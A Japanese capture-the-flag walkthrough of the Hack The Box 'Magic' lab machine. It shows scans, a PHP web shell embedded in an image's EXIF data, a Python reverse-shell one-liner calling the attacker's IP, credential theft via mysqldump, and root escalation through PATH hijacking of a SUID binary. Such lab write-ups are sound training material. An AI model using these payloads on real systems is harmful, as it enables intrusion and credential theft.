はじめに
筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は medium です
medium の中では簡単な方の machine です
nmap
kali@kali:~$ nmap -sC -sV 10.10.10.185 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 00:27 EDT
Nmap scan report for 10.10.10.185
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.92 seconds80 番ポート
/index.php
/login.php
SQLi で login
login の部分で username に ' を入れると login 失敗とは違う動作をします(具体的には login フォームにそのまま戻ってくるという動きをします。
SQLi を疑って色々弄っていると
Burp で intercept して以下のように書き換えます。
これで intercept を off に切り替えると
login に成功します 何かしらの画像の upload 画面が出ています
image の exif に php を埋め込み
SQLi からかなり詰まったのですが、
do you know an image can hide a lot of information? Maybe you just need the right tool.
Forum のこのコメントをみてやっとピンときました。(というのも先日 Recruit のイベントで同様に exif を使う問題を見ていたので…)
$ exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.pngこれで cmd という queryparams を受け取り、shell に流すようにします。
image は hoge.php.png という形式で upload します(png 以外弾かれるようになっているので)
upload された image がどこに行くのか gobuster で探します。
kali@kali:~$ gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.185/
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/05/30 03:48:33 Starting gobuster
===============================================================
/login.php (Status: 200)
/index.php (Status: 200)
/images (Status: 301)
/assets (Status: 301)
/upload.php (Status: 302)
/logout.php (Status: 302)
/purple.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/05/30 04:32:59 Finished
===============================================================
kali@kali:~$ gobuster dir -u http://10.10.10.185/images/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.185/images/
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/05/30 04:33:45 Starting gobuster
===============================================================
/uploads (Status: 301)
===============================================================
2020/05/30 05:18:29 Finished
===============================================================/images/uploads が怪しいですね
先ほどの画面から upload して
そしてこれ ↓ を
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'以下のように URL エンコードしてアクセスすると
http://10.10.10.185/images/uploads/test.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.4%22,1212));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27シェルが取れます
kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.185] 40024
/bin/sh: 0: can't access tty; job control turned off
$user を獲得する
www-data@ubuntu:/$ cd /var/www/Magic
cd /var/www/Magic
www-data@ubuntu:/var/www/Magic$ ls
ls
assets images login.php purple.php
db.php5 index.php logout.php upload.php
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
private static $cont = null;
public function __construct() {
die('Init function is not allowed');
}
public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}
public static function disconnect()
{
self::$cont = null;
}
}よくある DB 覗くパターンかーと思ったら単純な mysql コマンドは使用できませんでした
www-data@ubuntu:/var/www/Magic$ ls -la /usr/bin/ | grep mysql
ls -la /usr/bin/ | grep mysql
-rwxr-xr-x 1 root root 3627200 Jan 21 06:10 mysql_config_editor
-rwxr-xr-x 1 root root 22558552 Jan 21 06:10 mysql_embedded
-rwxr-xr-x 1 root root 5179616 Jan 21 06:10 mysql_install_db
-rwxr-xr-x 1 root root 3616952 Jan 21 06:10 mysql_plugin
-rwxr-xr-x 1 root root 3784424 Jan 21 06:10 mysql_secure_installation
-rwxr-xr-x 1 root root 3653288 Jan 21 06:10 mysql_ssl_rsa_setup
-rwxr-xr-x 1 root root 3569976 Jan 21 06:10 mysql_tzinfo_to_sql
-rwxr-xr-x 1 root root 4442320 Jan 21 06:10 mysql_upgrade
-rwxr-xr-x 1 root root 3799752 Jan 21 06:10 mysqladmin
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqlanalyze -> mysqlcheck
-rwxr-xr-x 1 root root 4068280 Jan 21 06:10 mysqlbinlog
-rwxr-xr-x 1 root root 3825320 Jan 21 06:10 mysqlcheck
-rwxr-xr-x 1 root root 26952 Jan 21 06:10 mysqld_multi
-rwxr-xr-x 1 root root 28448 Jan 21 06:10 mysqld_safe
-rwxr-xr-x 1 root root 3875176 Jan 21 06:10 mysqldump
-rwxr-xr-x 1 root root 7865 Jan 21 06:10 mysqldumpslow
-rwxr-xr-x 1 root root 3791912 Jan 21 06:10 mysqlimport
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqloptimize -> mysqlcheck
-rwxr-xr-x 1 root root 4286120 Jan 21 06:10 mysqlpump
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqlrepair -> mysqlcheck
-rwxr-xr-x 1 root root 39016 Jan 12 2018 mysqlreport
-rwxr-xr-x 1 root root 3790504 Jan 21 06:10 mysqlshow
-rwxr-xr-x 1 root root 3809512 Jan 21 06:10 mysqlslap
www-data@ubuntu:/var/www/Magic$見てみると mysqldump なら使えそうです
www-data@ubuntu:/var/www/Magic$ mysqldump --databases Magic -utheseus -piamkingtheseus
<qldump --databases Magic -utheseus -piamkingtheseus
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `Magic`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `Magic`;
--
-- Table structure for table `login`
--
DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
`id` int(6) NOT NULL AUTO_INCREMENT,
`username` varchar(50) NOT NULL,
`password` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `login`
--
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2020-05-29 23:43:16INSERT INTOloginVALUES (1,'admin','Th3s3usW4sK1ng');が怪しいですね
www-data@ubuntu:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:/var/www/Magic$theseus に昇格できました。これで user が取れます
PE
SUID なファイルを探します
theseus@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/snap/core18/1223/bin/mount
/snap/core18/1223/bin/ping
/snap/core18/1223/bin/su
/snap/core18/1223/bin/umount
/snap/core18/1223/usr/bin/chfn
/snap/core18/1223/usr/bin/chsh
/snap/core18/1223/usr/bin/gpasswd
/snap/core18/1223/usr/bin/newgrp
/snap/core18/1223/usr/bin/passwd
/snap/core18/1223/usr/bin/sudo
/snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1223/usr/lib/openssh/ssh-keysign
/snap/core18/1668/bin/mount
/snap/core18/1668/bin/ping
/snap/core18/1668/bin/su
/snap/core18/1668/bin/umount
/snap/core18/1668/usr/bin/chfn
/snap/core18/1668/usr/bin/chsh
/snap/core18/1668/usr/bin/gpasswd
/snap/core18/1668/usr/bin/newgrp
/snap/core18/1668/usr/bin/passwd
/snap/core18/1668/usr/bin/sudo
/snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1668/usr/lib/openssh/ssh-keysign
/snap/core/8689/bin/mount
/snap/core/8689/bin/ping
/snap/core/8689/bin/ping6
/snap/core/8689/bin/su
/snap/core/8689/bin/umount
/snap/core/8689/usr/bin/chfn
/snap/core/8689/usr/bin/chsh
/snap/core/8689/usr/bin/gpasswd
/snap/core/8689/usr/bin/newgrp
/snap/core/8689/usr/bin/passwd
/snap/core/8689/usr/bin/sudo
/snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8689/usr/lib/openssh/ssh-keysign
/snap/core/8689/usr/lib/snapd/snap-confine
/snap/core/8689/usr/sbin/pppd
/snap/core/7917/bin/mount
/snap/core/7917/bin/ping
/snap/core/7917/bin/ping6
/snap/core/7917/bin/su
/snap/core/7917/bin/umount
/snap/core/7917/usr/bin/chfn
/snap/core/7917/usr/bin/chsh
/snap/core/7917/usr/bin/gpasswd
/snap/core/7917/usr/bin/newgrp
/snap/core/7917/usr/bin/passwd
/snap/core/7917/usr/bin/sudo
/snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7917/usr/lib/openssh/ssh-keysign
/snap/core/7917/usr/lib/snapd/snap-confine
/snap/core/7917/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/pingんーーー?
sysinfo に着目する
これまた forum からヒントを持ってきたのですが、sysinfo なんてコマンドありそうでないですよね? なのでこれは custom されたコマンドということになります。
root@ubuntu:/tmp# sysinfo
sysinfo
====================Hardware Info====================
H/W path Device Class Description
=====================================================
system VMware Virtual Platform
/0 bus 440BX Desktop Reference Platform
/0/0 memory 86KiB BIOS
/0/1 processor AMD EPYC 7401P 24-Core Processor
/0/1/0 memory 16KiB L1 cache
/0/1/1 memory 16KiB L1 cache
/0/1/2 memory 512KiB L2 cache
/0/1/3 memory 512KiB L2 cache
/0/2 processor AMD EPYC 7401P 24-Core Processor
/0/28 memory System Memory
/0/28/0 memory 4GiB DIMM DRAM EDO
/0/28/1 memory DIMM DRAM [empty]
/0/28/2 memory DIMM DRAM [empty]
/0/28/3 memory DIMM DRAM [empty]
/0/28/4 memory DIMM DRAM [empty]
/0/28/5 memory DIMM DRAM [empty]
/0/28/6 memory DIMM DRAM [empty]
/0/28/7 memory DIMM DRAM [empty]
/0/28/8 memory DIMM DRAM [empty]
/0/28/9 memory DIMM DRAM [empty]
/0/28/a memory DIMM DRAM [empty]
/0/28/b memory DIMM DRAM [empty]
/0/28/c memory DIMM DRAM [empty]
/0/28/d memory DIMM DRAM [empty]
/0/28/e memory DIMM DRAM [empty]
/0/28/f memory DIMM DRAM [empty]
/0/28/10 memory DIMM DRAM [empty]
/0/28/11 memory DIMM DRAM [empty]
/0/28/12 memory DIMM DRAM [empty]
/0/28/13 memory DIMM DRAM [empty]
/0/28/14 memory DIMM DRAM [empty]
/0/28/15 memory DIMM DRAM [empty]
/0/28/16 memory DIMM DRAM [empty]
/0/28/17 memory DIMM DRAM [empty]
/0/28/18 memory DIMM DRAM [empty]
/0/28/19 memory DIMM DRAM [empty]
/0/28/1a memory DIMM DRAM [empty]
/0/28/1b memory DIMM DRAM [empty]
/0/28/1c memory DIMM DRAM [empty]
/0/28/1d memory DIMM DRAM [empty]
/0/28/1e memory DIMM DRAM [empty]
/0/28/1f memory DIMM DRAM [empty]
/0/28/20 memory DIMM DRAM [empty]
/0/28/21 memory DIMM DRAM [empty]
/0/28/22 memory DIMM DRAM [empty]
/0/28/23 memory DIMM DRAM [empty]
/0/28/24 memory DIMM DRAM [empty]
/0/28/25 memory DIMM DRAM [empty]
/0/28/26 memory DIMM DRAM [empty]
/0/28/27 memory DIMM DRAM [empty]
/0/28/28 memory DIMM DRAM [empty]
/0/28/29 memory DIMM DRAM [empty]
/0/28/2a memory DIMM DRAM [empty]
/0/28/2b memory DIMM DRAM [empty]
/0/28/2c memory DIMM DRAM [empty]
/0/28/2d memory DIMM DRAM [empty]
/0/28/2e memory DIMM DRAM [empty]
/0/28/2f memory DIMM DRAM [empty]
/0/28/30 memory DIMM DRAM [empty]
/0/28/31 memory DIMM DRAM [empty]
/0/28/32 memory DIMM DRAM [empty]
/0/28/33 memory DIMM DRAM [empty]
/0/28/34 memory DIMM DRAM [empty]
/0/28/35 memory DIMM DRAM [empty]
/0/28/36 memory DIMM DRAM [empty]
/0/28/37 memory DIMM DRAM [empty]
/0/28/38 memory DIMM DRAM [empty]
/0/28/39 memory DIMM DRAM [empty]
/0/28/3a memory DIMM DRAM [empty]
/0/28/3b memory DIMM DRAM [empty]
/0/28/3c memory DIMM DRAM [empty]
/0/28/3d memory DIMM DRAM [empty]
/0/28/3e memory DIMM DRAM [empty]
/0/28/3f memory DIMM DRAM [empty]
/0/3 memory
/0/3/0 memory DIMM [empty]
/0/4 memory
/0/4/0 memory DIMM [empty]
/0/5 memory
/0/5/0 memory DIMM [empty]
/0/6 memory
/0/6/0 memory DIMM [empty]
/0/7 memory
/0/7/0 memory DIMM [empty]
/0/8 memory
/0/8/0 memory DIMM [empty]
/0/9 memory
/0/9/0 memory DIMM [empty]
/0/a memory
/0/a/0 memory DIMM [empty]
/0/b memory
/0/b/0 memory DIMM [empty]
/0/c memory
/0/c/0 memory DIMM [empty]
/0/d memory
/0/d/0 memory DIMM [empty]
/0/e memory
/0/e/0 memory DIMM [empty]
/0/f memory
/0/f/0 memory DIMM [empty]
/0/10 memory
/0/10/0 memory DIMM [empty]
/0/11 memory
/0/11/0 memory DIMM [empty]
/0/12 memory
/0/12/0 memory DIMM [empty]
/0/13 memory
/0/13/0 memory DIMM [empty]
/0/14 memory
/0/14/0 memory DIMM [empty]
/0/15 memory
/0/15/0 memory DIMM [empty]
/0/16 memory
/0/16/0 memory DIMM [empty]
/0/17 memory
/0/17/0 memory DIMM [empty]
/0/18 memory
/0/18/0 memory DIMM [empty]
/0/19 memory
/0/19/0 memory DIMM [empty]
/0/1a memory
/0/1a/0 memory DIMM [empty]
/0/1b memory
/0/1b/0 memory DIMM [empty]
/0/1c memory
/0/1c/0 memory DIMM [empty]
/0/1d memory
/0/1d/0 memory DIMM [empty]
/0/1e memory
/0/1e/0 memory DIMM [empty]
/0/1f memory
/0/1f/0 memory DIMM [empty]
/0/20 memory
/0/20/0 memory DIMM [empty]
/0/21 memory
/0/21/0 memory DIMM [empty]
/0/22 memory
/0/22/0 memory DIMM [empty]
/0/23 memory
/0/23/0 memory DIMM [empty]
/0/24 memory
/0/24/0 memory DIMM [empty]
/0/25 memory
/0/25/0 memory DIMM [empty]
/0/26 memory
/0/26/0 memory DIMM [empty]
/0/27 memory
/0/27/0 memory DIMM [empty]
/0/29 memory
/0/29/0 memory DIMM [empty]
/0/2a memory
/0/2a/0 memory DIMM [empty]
/0/2b memory
/0/2b/0 memory DIMM [empty]
/0/2c memory
/0/2c/0 memory DIMM [empty]
/0/2d memory
/0/2d/0 memory DIMM [empty]
/0/2e memory
/0/2e/0 memory DIMM [empty]
/0/2f memory
/0/2f/0 memory DIMM [empty]
/0/30 memory
/0/30/0 memory DIMM [empty]
/0/31 memory
/0/31/0 memory DIMM [empty]
/0/32 memory
/0/32/0 memory DIMM [empty]
/0/33 memory
/0/33/0 memory DIMM [empty]
/0/34 memory
/0/34/0 memory DIMM [empty]
/0/35 memory
/0/35/0 memory DIMM [empty]
/0/36 memory
/0/36/0 memory DIMM [empty]
/0/37 memory
/0/37/0 memory DIMM [empty]
/0/38 memory
/0/38/0 memory DIMM [empty]
/0/39 memory
/0/39/0 memory DIMM [empty]
/0/3a memory
/0/3a/0 memory DIMM [empty]
/0/3b memory
/0/3b/0 memory DIMM [empty]
/0/3c memory
/0/3c/0 memory DIMM [empty]
/0/3d memory
/0/3d/0 memory DIMM [empty]
/0/3e memory
/0/3e/0 memory DIMM [empty]
/0/3f memory
/0/3f/0 memory DIMM [empty]
/0/40 memory
/0/40/0 memory DIMM [empty]
/0/41 memory
/0/41/0 memory DIMM [empty]
/0/42 memory
/0/42/0 memory DIMM [empty]
/0/43 memory
/0/43/0 memory DIMM [empty]
/0/44 memory
/0/45 memory
/0/100 bridge 440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1 bridge 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7 bridge 82371AB/EB/MB PIIX4 ISA
/0/100/7.1 storage 82371AB/EB/MB PIIX4 IDE
/0/100/7.3 bridge 82371AB/EB/MB PIIX4 ACPI
/0/100/7.7 generic Virtual Machine Communication Interface
/0/100/f display SVGA II Adapter
/0/100/10 scsi2 storage 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI
/0/100/10/0.0.0 /dev/sda disk 21GB Virtual disk
/0/100/10/0.0.0/1 /dev/sda1 volume 19GiB EXT4 volume
/0/100/11 bridge PCI bridge
/0/100/11/0 bus USB1.1 UHCI Controller
/0/100/11/0/1 usb2 bus UHCI Host Controller
/0/100/11/0/1/1 input VMware Virtual USB Mouse
/0/100/11/0/1/2 bus VMware Virtual USB Hub
/0/100/11/1 bus USB2 EHCI Controller
/0/100/11/1/1 usb1 bus EHCI Host Controller
/0/100/15 bridge PCI Express Root Port
/0/100/15/0 ens160 network VMXNET3 Ethernet Controller
/0/100/15.1 bridge PCI Express Root Port
/0/100/15.2 bridge PCI Express Root Port
/0/100/15.3 bridge PCI Express Root Port
/0/100/15.4 bridge PCI Express Root Port
/0/100/15.5 bridge PCI Express Root Port
/0/100/15.6 bridge PCI Express Root Port
/0/100/15.7 bridge PCI Express Root Port
/0/100/16 bridge PCI Express Root Port
/0/100/16.1 bridge PCI Express Root Port
/0/100/16.2 bridge PCI Express Root Port
/0/100/16.3 bridge PCI Express Root Port
/0/100/16.4 bridge PCI Express Root Port
/0/100/16.5 bridge PCI Express Root Port
/0/100/16.6 bridge PCI Express Root Port
/0/100/16.7 bridge PCI Express Root Port
/0/100/17 bridge PCI Express Root Port
/0/100/17.1 bridge PCI Express Root Port
/0/100/17.2 bridge PCI Express Root Port
/0/100/17.3 bridge PCI Express Root Port
/0/100/17.4 bridge PCI Express Root Port
/0/100/17.5 bridge PCI Express Root Port
/0/100/17.6 bridge PCI Express Root Port
/0/100/17.7 bridge PCI Express Root Port
/0/100/18 bridge PCI Express Root Port
/0/100/18.1 bridge PCI Express Root Port
/0/100/18.2 bridge PCI Express Root Port
/0/100/18.3 bridge PCI Express Root Port
/0/100/18.4 bridge PCI Express Root Port
/0/100/18.5 bridge PCI Express Root Port
/0/100/18.6 bridge PCI Express Root Port
/0/100/18.7 bridge PCI Express Root Port
/0/46 scsi0 storage
/0/46/0.0.0 /dev/cdrom disk VMware IDE CDR00
/1 system
====================Disk Info====================
Disk /dev/loop0: 44.9 MiB, 47063040 bytes, 91920 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop1: 3.7 MiB, 3825664 bytes, 7472 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop2: 3.7 MiB, 3862528 bytes, 7544 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop3: 89.1 MiB, 93454336 bytes, 182528 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop4: 44.2 MiB, 46325760 bytes, 90480 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop5: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop6: 54.7 MiB, 57294848 bytes, 111904 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop7: 160.2 MiB, 167931904 bytes, 327992 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x44c94251
Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 41940991 41938944 20G 83 Linux
Disk /dev/loop8: 91.4 MiB, 95805440 bytes, 187120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop9: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop10: 54.5 MiB, 57151488 bytes, 111624 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop11: 149.9 MiB, 157192192 bytes, 307016 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
====================CPU Info====================
processor : 0
vendor_id : AuthenticAMD
cpu family : 23
model : 1
model name : AMD EPYC 7401P 24-Core Processor
stepping : 2
microcode : 0x8001230
cpu MHz : 2000.000
cache size : 512 KB
physical id : 0
siblings : 1
core id : 0
cpu cores : 1
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips : 4000.00
TLB size : 2560 4K pages
clflush size : 64
cache_alignment : 64
address sizes : 43 bits physical, 48 bits virtual
power management:
processor : 1
vendor_id : AuthenticAMD
cpu family : 23
model : 1
model name : AMD EPYC 7401P 24-Core Processor
stepping : 2
microcode : 0x8001230
cpu MHz : 2000.000
cache size : 512 KB
physical id : 2
siblings : 1
core id : 0
cpu cores : 1
apicid : 2
initial apicid : 2
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips : 4000.00
TLB size : 2560 4K pages
clflush size : 64
cache_alignment : 64
address sizes : 43 bits physical, 48 bits virtual
power management:
====================MEM Usage=====================
total used free shared buff/cache available
Mem: 3.8G 595M 1.6G 12M 1.6G 3.0G
Swap: 947M 0B 947MDisk Info が fdisk -l の実行の結果と同じであることがわかります。
PATH をうまく使い実行される fdisk を置き換えます。
theseus@ubuntu:/tmp$ touch fdisk
touch fdisk
theseus@ubuntu:/tmp$ echo /bin/bash > fdisk
echo /bin/bash > fdisk
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$これで本来の fdisk の代わりに/tmp/fdisk が実行されるはずです
root@ubuntu:/tmp# ls
ls
root@ubuntu:/tmp# cd ../root
cd ../rootなぜか出力が帰ってこない shell になってしまったので image に埋め込んだ python の
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'を流用して別 shell で nc で受け取ります
すると
kali@kali:~$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.185] 40152
root@ubuntu:/root# ls
ls
info.c
root.txtこれで root が取れます
終わりに
めちゃめちゃ楽しいマシンでした!image の exif 使うあたりはかなり悩んでずっと forum でヒントを探していました。笑
